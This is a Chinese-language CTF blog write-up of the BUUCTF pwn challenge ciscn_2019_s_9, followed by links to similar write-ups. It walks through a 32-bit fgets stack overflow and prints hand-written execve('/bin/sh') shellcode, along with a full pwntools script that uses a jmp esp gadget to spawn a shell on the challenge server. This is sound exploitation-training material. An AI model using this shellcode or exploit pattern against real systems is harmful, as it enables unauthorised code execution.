BUUCTF PWN ciscn_2019_s_9

已于 2022-04-23 09:00:31 修改
阅读量310 收藏 2
点赞数
分类专栏: BUUCTF 文章标签: python 安全 pwn linux c语言
于 2022-04-22 20:31:06 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/arraylocalhost/article/details/124351642
版权
本文介绍了如何通过ida分析程序,找到hint和pwn函数,利用fgets函数溢出进行栈溢出攻击。通过手动编写shellcode,控制程序执行流,最终实现远程连接并交互。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

1.checksec+运行

32位/没有保护

2.32IDA进行中

1.hint函数

提示函数,很有帮助,解题关键点

直接跳到esp栈顶指针

2.pwn函数

 明显的fgets()函数溢出

跟进s看看偏移

 offset = 0x20+4

向s里写入shellcode

注意一点:

如果直接用pwntools生成的shellcode,会很长,s里写不下

所以这就需要我们手动写入shellcode

shellcode ='''
xor eax,eax             #eax置0
xor edx,edx				#edx置0
push edx				#将0入栈,标记了”/bin/sh”的结尾
push 0x68732f2f         #传递”/sh”,为了4字节对齐,使用//sh,这在execve()中等同于/sh
push 0x6e69622f         #传递“/bin”
mov ebx,esp             #此时esp指向了”/bin/sh”,通过esp将该字符串的值传递给ebx
xor ecx,ecx
mov al,0xB              #eax置为execve函数的中断号
int 0x80                #调用软中断
'''
shellcode=asm(shellcode)

这样就很完美的将shellcode的长度控制在21

机器码计算的长度为21,看其他师傅的博客为23的长度,具体不知,先记下,再研究(2022年4月23日)

\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80

 

3.脚本

from pwn import*
#p=process('./ciscns9')
p=remote("node4.buuoj.cn",26901)
jump_esp=0x8048554





shellcode =b"\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80"

payload=shellcode.ljust(0x24,b'\x00')+p32(jump_esp)+asm("sub esp,40;call esp")

#hex(40)=0x28----->0x24+4
#esp-0x28
#调用esp




p.sendline(payload)
p.interactive()

[BUUCTF]-PWN:ciscn_2019_es_7解析(系统调用execve,srop)
2301_79326813的博客
01-30 533
这道题好像和buu的ciscn_2019_s_3是一模一样的看保护64位,没开canary和pie看ida题目还有能往rax传递0x3B和0xf的函数,这就提示我们可以用系统调用来getshell。
BUUCTF栈迁移ciscn_2019_es_2
Rt1Text的博客
04-09 1132
1.checksec+运行获取基本信息 32位+NX堆栈不可执行 2.常规IDA操作 1.main函数 并没有什么 2.int vul()函数 程序主体,信息很多 1.两次read都在往同一个地方s处读入数据 2.要读入0x30,但s大小只有0x28,如果有后门函数,直接常规栈溢出操作 但是shift+f12 这里仅仅是打印flag字符串,没有用 同时查看hack函数 system里面的参数不是bin_sh不能直接用,所以要修改system的参数 但是...
[BUUCTF] ciscn_2019_s_9
zyxx_wjc的博客
07-10 335
ciscn_2019_s_9
[buuctf]ciscn_2019_s_9
逆向萌新的博客
07-15 1127
[buuctf]ciscn_2019_s_9
[BUUCTF]PWN——ciscn_2019_s_9
BangSen1的博客
04-26 610
ciscn_2019_s_9 参考 例行检查 ,32位,未开启任何保护 运行一下。 32位ida载入,,第10行的fgets,能够溢出0x32-0x20-0x4个字节 没用nx保护,首先想到的就是往s里写入shellcode,然后跳转到s执行shellcode 生成的shellcode的长度过长,参数 s0x20(32) 写不下。 shellcode =''' xor eax,eax #eax置0 xor edx,edx #edx置0 push edx #将0入栈,标
[BUUCTF]PWN——ciscn_2019_s_9(汇编代码写shellcode)
mcmuyanga的博客
01-28 1911
ciscn_2019_s_9 附件 步骤 例行检查,32位程序,没用开启任何保护 本地试运行看一下程序大概的情况 32位ida载入,第10行的fgets,能够溢出0x32-0x20-0x4个字节 由于没用nx保护,首先想到的就是往s里写入shellcode,然后跳转到s执行shellcode,s在栈上,ida里有一个函数,为我们提供了跳转到栈上的指令jmp esp 现在就一个问题,s大小只有0x20,用下面的shellcode不懂能不能完全写入 context(log_level = 'debu
BUUCTF之“ciscn_2019_s_9”见32位shellcode的简单写法,以及其中的难解之处
Probeginner的博客
12-09 314
32位简单shellcode
BUUCTF pwn ciscn_2019_s_3(SROP)
菜的只能随便写写博客
02-13 1673
0x01 文件分析   0x02 运行  有一个回显,并且还有多余的字符显示,接着看代码分析一下。   0x03 IDA源码  由后面的函数可以看出,这个程序使用的系统调用,并且vuln里面存在栈溢出。  在程序之中的gadgets存在着两个为rax赋值的gadget,15的系统号是rt_sigreturn,3b的系统调用是execve,利用这两个可以执行系统调用得到shell。  ex...
日行一PWNciscn_2019_c_1不给出libc题型
m0_57221101的博客
06-02 899
BUUCTF ciscn 依旧使用buu提供的题这次大体和上次babyrop一样,都是使用源程序中不存在的函数来进行攻击,区别在于此次没有给出libc的版本,我们需要自己暴漏libc的版本以及本次的64位程序,在传参上和32位程序的一些不同闲话少叙,后面需要的知识点我们后面再学,我们便分析边聊checksec分析64位的程序,只有数据段免执行保护。地址为0000000000400B28我们可以通过telnet连接一下看看她在干什么可以看到是一个简单的输入判断
buuctf:ciscn_s_3题解
xia0ji233
05-27 816
title: 系统调用的学习 date: 2021-05-25 22:00:00 tags: binary security study report syscall comments: true categories: ctf pwn today新的知识又增长了,发现了getshell的另一种方式:syscall和srop。故事还要源于…(此处省略万字输出) (note:本作者这次有点懒,没有写AT&T汇编,而是一律用了intel汇编,请悉知) 可能是之前汇编基础不太好吧,竟没有发现sy.
ciscn_2019_s_9
z1r0的博客
12-28 1171
ciscn_2019_s_9 查看保护 妥妥的shellcode题目 溢出,返回到s地址处的shellcode。给了一个hint,借助jmp esp这个跳板让eip成功执行到shellcode。 shellcode大小要小于0x20即可。 from pwn import * context(arch='i386', os='linux', log_level='debug') file_name = './z1r0' debug = 1 if debug: r = remote('nod
ciscn_2019_s_9详解
最新发布
勿山几已
06-12 491
详解pwn入门题ciscn_2019_s_9
2019全国大学生信息安全竞赛ciscn-writeup(4web)
weixin_30446613的博客
04-23 1506
web1-JustSoso php伪协议获取源码 ?file=php://filter/read=convert.base64-encode/resource=index.php index.php 1 <html> 2 <?php 3 error_reporting(0); 4 $file = $_GET["file"]; 5 $payload...
ciscn_2019_s_1
doudoudedi
06-29 825
思路 通过off by null写key值然后unlink写bss段再次double free写free_hook即可拿到shell exp: from pwn import * #p=process('./ciscn_s_1') p=remote('node3.buuoj.cn',26429) elf=ELF('./ciscn_s_1') libc=elf.libc def add(idx,size,data): p.sendlineafter('show','1') p.sendlineafte
21 07 28学习总结
eeeeeight的博客
07-29 192
21.07.28学习总结 Column: July 28, 2021 Tags: learning experience 11:00-12:00: buu刷题: ciscn_2019_final_3我写的不好, 写成要爆破的了 14:25-16:30: :buu刷题: ciscn_2019_es_7: 和ciscn_2019_s_3一模一样 ciscn_2019_s_9: 写一段汇编就好了 picoctf_2018_shellcode: ret2shellcode, 我傻逼了 actf_2019_babys
BUUCTF-PWN刷题记录-6
weixin_44145820的博客
04-14 926
目录picoctf_2018_are you rootciscn_2019_final_2 picoctf_2018_are you root 例行安全检查 菜单如下: 我们需要auth_level等于5才能get flag user结构体如下 struct USER{ char *name; long long auth_level; } 漏洞原理分析: 在login中分配了两次内存...
pwnciscn_2019_s_4
Nothing
03-06 840
main函数,存在八个字节溢出,栈迁移,第一次泄露ebp,得到栈上buf地址,迁移到buf即可。 from pwn import * io=remote('node3.buuoj.cn',28060) leave=0x8048562 sys_plt=0x8048400 pl1='a'*0x24+'bbbb' io.send(pl1) io.recvuntil('bbbb') ebp=u32(...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值